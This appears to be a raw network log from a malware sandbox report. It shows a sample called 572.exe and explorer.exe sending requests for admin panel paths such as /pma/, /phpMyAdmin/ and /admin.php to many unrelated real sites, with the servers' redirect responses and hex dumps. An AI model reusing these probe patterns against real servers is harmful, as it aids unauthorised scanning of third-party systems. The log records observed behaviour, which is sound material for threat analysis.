                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.725399971 CET338INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 12:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://mojadovera.sk/pma/
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd6b0c1e53de-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                554192.168.2.64991245.60.0.4480524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.602091074 CET169OUTGET /pma/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: m.codere.com.co
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.825048923 CET931INHTTP/1.1 302 Redirect
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Location: https://m.codere.com.co/pma/
                                                                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 151
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: visid_incap_2786379=hlpIXcn9RyeS5pqQjLHvrXzDwGUAAAAAQUIPAAAAAADprIzRk3UO2rMvvlyroBMr; expires=Tue, 04 Feb 2025 10:21:14 GMT; HttpOnly; path=/; Domain=.codere.com.co
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: nlbi_2786379=qQ7OL9ri/xfPwc9vaJQkpgAAAAAT6+z8Xi/STIi/imJ8KXK7; path=/; Domain=.codere.com.co
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: incap_ses_1816_2786379=GmwLPGm/8ysfgRA+arozGXzDwGUAAAAAWc95nFYQh4VkaUEfADF5kQ==; path=/; Domain=.codere.com.co
                                                                                                                                                                                                                                                                                                                                                                X-CDN: Imperva
                                                                                                                                                                                                                                                                                                                                                                X-Iinfo: 44-17307771-17307561 PNNy RT(1707131772394 1) q(0 0 0 0) r(2 2) U24
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 4d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 4f 62 6a 65 63 74 20 4d 6f 76 65 64 3c 2f 68 31 3e 54 68 69 73 20 64 6f 63 75 6d 65 6e 74 20 6d 61 79 20 62 65 20 66 6f 75 6e 64 20 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 6d 2e 63 6f 64 65 72 65 2e 63 6f 6d 2e 63 6f 2f 70 6d 61 2f 22 3e 68 65 72 65 3c 2f 61 3e 3c 2f 62 6f 64 79 3e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="https://m.codere.com.co/pma/">here</a></body>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                555192.168.2.649905104.255.105.7980524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.610148907 CET178OUTGET /pma/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: signin.rockstargames.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.732676983 CET141INHTTP/1.0 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Location: https://signin.rockstargames.com/pma/
                                                                                                                                                                                                                                                                                                                                                                Server: BigIP
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                556192.168.2.64987187.233.198.20804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.623770952 CET184OUTGET /admin.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: idp.uitgeverij-deviant.nl
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.818062067 CET121INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                content-length: 0
                                                                                                                                                                                                                                                                                                                                                                location: https://idp.uitgeverij-deviant.nl/admin.php
                                                                                                                                                                                                                                                                                                                                                                cache-control: no-cache


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                557192.168.2.6499193.161.136.280524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.625106096 CET181OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.binance.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.726754904 CET581INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Server: CloudFront
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 167
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://accounts.binance.com/phpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                X-Cache: Redirect from cloudfront
                                                                                                                                                                                                                                                                                                                                                                Via: 1.1 f4a9c912221b840a5f27fb82db198fd0.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: ATL59-P4
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: Qq6N2-GLYtbafd-AjQJEClsm5E3m3KhqlokWvx3pwz26Z9PWnNiBjw==
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>CloudFront</center></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                558192.168.2.649721124.237.208.3780524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.641943932 CET168OUTGET /admin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: pan.baidu.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.001400948 CET1280INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                Etag: W/"62650964-3feb"
                                                                                                                                                                                                                                                                                                                                                                Logid: 8900821477649888728
                                                                                                                                                                                                                                                                                                                                                                P3p: CP=" OTI DSP COR IVA OUR IND COM "
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: PANPSC=; expires=Fri, 01-Apr-1900 00:00:00 GMT; path=/; domain=pan.baidu.com; HttpOnly;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: BAIDUID=338AE0F115629B5ECE6D8E5A1004A3BC:FG=1; expires=Tue, 04-Feb-25 11:16:12 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: BaiduCloud
                                                                                                                                                                                                                                                                                                                                                                Yld: 8900821477649888728
                                                                                                                                                                                                                                                                                                                                                                Yme: ZIGW/y8rX0QMaTUDUmr/tGtIovoZVAD0qgpNwySEne+xE0x0ZK/5Y6tb3A==
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 38 39 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b5 59 7b 6f db c8 11 ff bb 06 f2 1d f6 98 a8 b6 01 53 8c 2c 3b b5 6c 49 81 2e 76 d0 00 6d 1c b4 77 7d 20 08 8c 15 b9 92 18 53 24 cb 87 25 5d 71 80 71 69 12 3b b9 c4 0d f2 b8 5c ec 3c 7b 49 ef 9a c6 76 0f d7 c6 e7 c4 f1 87 39 51 8f bf ee 2b 74 96 94 64 52 a2 44 d9 71 48 5b 22 77 67 67 7e 3b 3b b3 33 3b 8a 7f 34 3d 7b ea 93 3f 9f 9b 41 39 23 2f 25 8f 0c c4 e9 37 92 b0 9c 4d 30 9f e5 d8 53 67 19 bb 91 60 81 7e e7 89 81 11 9f c3 9a 4e 8c 04 f3 e9 27 a7 d9 09 bb df 10 0d 89 24 eb 4f ff 5b 7f f8 ac bc 75 c3 7a 75 df 5a fb 36 ce 39 cd d0 2f 89 f2 3c ca 69 24 93 60 38 4e c5 72 38 8d 45 c1 0c f3 4a 9e 53 55 8d e8 9c 6e 60 43 e4 39 31 8f b3 f0 96 c1 0b 22 af c8 61 f8 60 90 46 a4 04 a3 e7 14 cd e0 4d 03 d1 76 a6 c5 d2 e9 33 4a 12 d1 73 84 18 0c 32 4a 2a 49 30 06 29 1a 1c af eb 4c 3f 32 81 8e 23 9a a6 68 73 58 92 c2 f0 76 d2 48 8c 1e 8f 44 8f 47 47 23 a3 b1 e8 98 2d ed 23 96 3d 2f 66 90 64 a0 33 33 28 76 81 36 e9 bc 26 aa 86 5b e2 45 bc 80 9d 56 06 e9 1a 1f 20 f7 a2 ce a9 92 99 e5 a8 c2 c7 c3 17 75 26 19 e7 9c d1 b6 c0 f3 44 16 c4 cc 05 96 75 c9 72 98 b6 73 49 9b 9e 19 b4 73 ea 3e d6 c8 89 9a a0 62 cd 28 71 74 81 89 c6 e5 15 c1 94 c8 9c f3 06 9c 3a 54 e1 66 cc 35 ad 22 ad 08 25 c4 4b 58 d7 13 8c 8d 83 1d 3b ee a8 4d 10 17 90 28 24 18 41 e1 e7 f2 58 b4 57 0e c1 15 77 24 34 07 e5 04 96 f6 c2 2b c1 5a 46 2c 32 f6 20 87 a6 39 c4 1e 86 9b 23 32 2c 35 04 56 52 b2 0a a2 1f 7b 2b 5d 32 5d 1a 67 50 31 2f c9 54 82 61 a8 93 1c 57 28 14 c2 85 68 58 d1 b2 5c 24 16 8b 71 45 aa 7c 3a 2b ec 96 22 e3 85 a6 1c 78 d4 fb 64 b2 c7 c0 0b 55 20 19 d6 e6 68 6a 1a 91 c1 34 72 22 34 29 bc 49 39 c2 e3 69 fa d8 c2 cf 24 cb 5b 6f c0 91 bc 90 6c 8e 3a 18 53 93 a9 4e 60 dd b0 41 ec 15 81 f6 76 5a aa f8 36 f9 39 ac b3 aa 29 49 82 52 90
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 89aY{oS,;lI.vmw} S$%]qqi;\<{Iv9Q+tdRDqH["wgg~;;3;4={?A9#/%7M0Sg`~N'$O[uzuZ69/<i$`8Nr8EJSUn`C91"a`FMv3Js2J*I0)L?2#hsXvHDGG#-#=/fd33(v6&[EV u&DursIs>b(qt:Tf5"%KX;M($AXWw$4+ZF,2 9#2,5VR{+]2]gP1/TaW(hX\$qE|:+"xdU hj4r"4)I9i$[ol:SN`AvZ69)IR
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.001429081 CET1280INData Raw: 59 5d 25 bc 88 3b 50 db 63 5b c8 5b d4 30 3c 00 b6 d7 d0 c1 0f b1 96 a5 5b c4 9c 4e a4 0c 78 03 75 d1 04 93 c6 fc 7c 56 53 4c 59 60 79 45 52 b4 49 a4 65 d3 43 d1 13 23 c8 f9 1f 9e 42 ae f6 d1 08 34 36 3f 86 a7 98 24 8a 93 bc d7 00 fc 38 ab 8a 2e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: Y]%;Pc[[0<[Nxu|VSLY`yERIeC#B46?$8."O"v";6H>YU]:VU$AU&dOAM$"0^Nzm2vPJW7HEMY2{~z}Am}{EOT @9o-@\ g9@
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.001445055 CET340INData Raw: 9d fd dd cc e0 91 81 0b 23 47 06 20 c5 3f e5 d4 27 27 d1 a0 53 0f 82 9e cf 87 a7 8e 0c ec 49 e1 1a fb 01 24 c7 95 eb cb 7b ed c7 86 98 a3 0b a2 ca 42 8a 29 83 13 95 98 e1 70 1a 36 f6 21 70 7f 53 27 0a c4 36 66 04 b5 80 13 0f 72 7a 91 30 ac ac 7a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: #G ?''SI${B)p6!pS'6frz0zNSTm@Fux8,!&GP`\:0sJL?pQFoPb^}V?}s'/3=}&>_xG4j>0@$~efi"c+T
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.001460075 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.010809898 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.211913109 CET1280INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                Etag: W/"62650964-3feb"
                                                                                                                                                                                                                                                                                                                                                                Logid: 8900821477649888728
                                                                                                                                                                                                                                                                                                                                                                P3p: CP=" OTI DSP COR IVA OUR IND COM "
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: PANPSC=; expires=Fri, 01-Apr-1900 00:00:00 GMT; path=/; domain=pan.baidu.com; HttpOnly;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: BAIDUID=338AE0F115629B5ECE6D8E5A1004A3BC:FG=1; expires=Tue, 04-Feb-25 11:16:12 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: BaiduCloud
                                                                                                                                                                                                                                                                                                                                                                Yld: 8900821477649888728
                                                                                                                                                                                                                                                                                                                                                                Yme: ZIGW/y8rX0QMaTUDUmr/tGtIovoZVAD0qgpNwySEne+xE0x0ZK/5Y6tb3A==
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 38 39 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b5 59 7b 6f db c8 11 ff bb 06 f2 1d f6 98 a8 b6 01 53 8c 2c 3b b5 6c 49 81 2e 76 d0 00 6d 1c b4 77 7d 20 08 8c 15 b9 92 18 53 24 cb 87 25 5d 71 80 71 69 12 3b b9 c4 0d f2 b8 5c ec 3c 7b 49 ef 9a c6 76 0f d7 c6 e7 c4 f1 87 39 51 8f bf ee 2b 74 96 94 64 52 a2 44 d9 71 48 5b 22 77 67 67 7e 3b 3b b3 33 3b 8a 7f 34 3d 7b ea 93 3f 9f 9b 41 39 23 2f 25 8f 0c c4 e9 37 92 b0 9c 4d 30 9f e5 d8 53 67 19 bb 91 60 81 7e e7 89 81 11 9f c3 9a 4e 8c 04 f3 e9 27 a7 d9 09 bb df 10 0d 89 24 eb 4f ff 5b 7f f8 ac bc 75 c3 7a 75 df 5a fb 36 ce 39 cd d0 2f 89 f2 3c ca 69 24 93 60 38 4e c5 72 38 8d 45 c1 0c f3 4a 9e 53 55 8d e8 9c 6e 60 43 e4 39 31 8f b3 f0 96 c1 0b 22 af c8 61 f8 60 90 46 a4 04 a3 e7 14 cd e0 4d 03 d1 76 a6 c5 d2 e9 33 4a 12 d1 73 84 18 0c 32 4a 2a 49 30 06 29 1a 1c af eb 4c 3f 32 81 8e 23 9a a6 68 73 58 92 c2 f0 76 d2 48 8c 1e 8f 44 8f 47 47 23 a3 b1 e8 98 2d ed 23 96 3d 2f 66 90 64 a0 33 33 28 76 81 36 e9 bc 26 aa 86 5b e2 45 bc 80 9d 56 06 e9 1a 1f 20 f7 a2 ce a9 92 99 e5 a8 c2 c7 c3 17 75 26 19 e7 9c d1 b6 c0 f3 44 16 c4 cc 05 96 75 c9 72 98 b6 73 49 9b 9e 19 b4 73 ea 3e d6 c8 89 9a a0 62 cd 28 71 74 81 89 c6 e5 15 c1 94 c8 9c f3 06 9c 3a 54 e1 66 cc 35 ad 22 ad 08 25 c4 4b 58 d7 13 8c 8d 83 1d 3b ee a8 4d 10 17 90 28 24 18 41 e1 e7 f2 58 b4 57 0e c1 15 77 24 34 07 e5 04 96 f6 c2 2b c1 5a 46 2c 32 f6 20 87 a6 39 c4 1e 86 9b 23 32 2c 35 04 56 52 b2 0a a2 1f 7b 2b 5d 32 5d 1a 67 50 31 2f c9 54 82 61 a8 93 1c 57 28 14 c2 85 68 58 d1 b2 5c 24 16 8b 71 45 aa 7c 3a 2b ec 96 22 e3 85 a6 1c 78 d4 fb 64 b2 c7 c0 0b 55 20 19 d6 e6 68 6a 1a 91 c1 34 72 22 34 29 bc 49 39 c2 e3 69 fa d8 c2 cf 24 cb 5b 6f c0 91 bc 90 6c 8e 3a 18 53 93 a9 4e 60 dd b0 41 ec 15 81 f6 76 5a aa f8 36 f9 39 ac b3 aa 29 49 82 52 90
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 89aY{oS,;lI.vmw} S$%]qqi;\<{Iv9Q+tdRDqH["wgg~;;3;4={?A9#/%7M0Sg`~N'$O[uzuZ69/<i$`8Nr8EJSUn`C91"a`FMv3Js2J*I0)L?2#hsXvHDGG#-#=/fd33(v6&[EV u&DursIs>b(qt:Tf5"%KX;M($AXWw$4+ZF,2 9#2,5VR{+]2]gP1/TaW(hX\$qE|:+"xdU hj4r"4)I9i$[ol:SN`AvZ69)IR


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                559192.168.2.6499203.134.125.17580524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.647785902 CET183OUTGET /pma/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: 3fba-180-252-166-236.ngrok.io
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.771877050 CET314INHTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Location: https://3fba-180-252-166-236.ngrok.io/pma/
                                                                                                                                                                                                                                                                                                                                                                Ngrok-Trace-Id: 4e87a26e1d5f36604aab9226b6488a88
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 78
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 33 66 62 61 2d 31 38 30 2d 32 35 32 2d 31 36 36 2d 32 33 36 2e 6e 67 72 6f 6b 2e 69 6f 2f 70 6d 61 2f 22 3e 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 61 3e 2e 0a 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <a href="https://3fba-180-252-166-236.ngrok.io/pma/">Temporary Redirect</a>.


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                560192.168.2.649936170.114.52.280524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.660207987 CET167OUTGET /pma/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: gitam.zoom.us
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.808171034 CET1003INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 134
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://gitam.zoom.us/pma/
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: __cf_bm=QRCPfZLumCOrUjC3J2vQvHQ3msXKvHDMUjyFhxAAtBM-1707131772-1-AfJ69FjPjbE+Yvy+geeVq8Q/zepcWpfemU9DKrKoKXETKa+X7V490iBHlNwaDsYZ1EMVp+ViSJoXrCv1JCgh/5U=; path=/; expires=Mon, 05-Feb-24 11:46:12 GMT; domain=.zoom.us; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MvbGpH%2FjptdQjGjvwHO34owE4wneO790jnel10yryINvZBwuSes%2BvL6kNvA0ifHvqXZWn%2BfP6BHT2l6LEm48HQfB025kYoG%2BAA%2FiVdWNFSe%2Fn1owR0KqnJRUMpRPDwo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd6b7acfb08b-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                561192.168.2.649937162.159.135.23280524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.660649061 CET170OUTGET /admin.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: discord.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.786185980 CET938INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 12:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://discord.com/admin.php
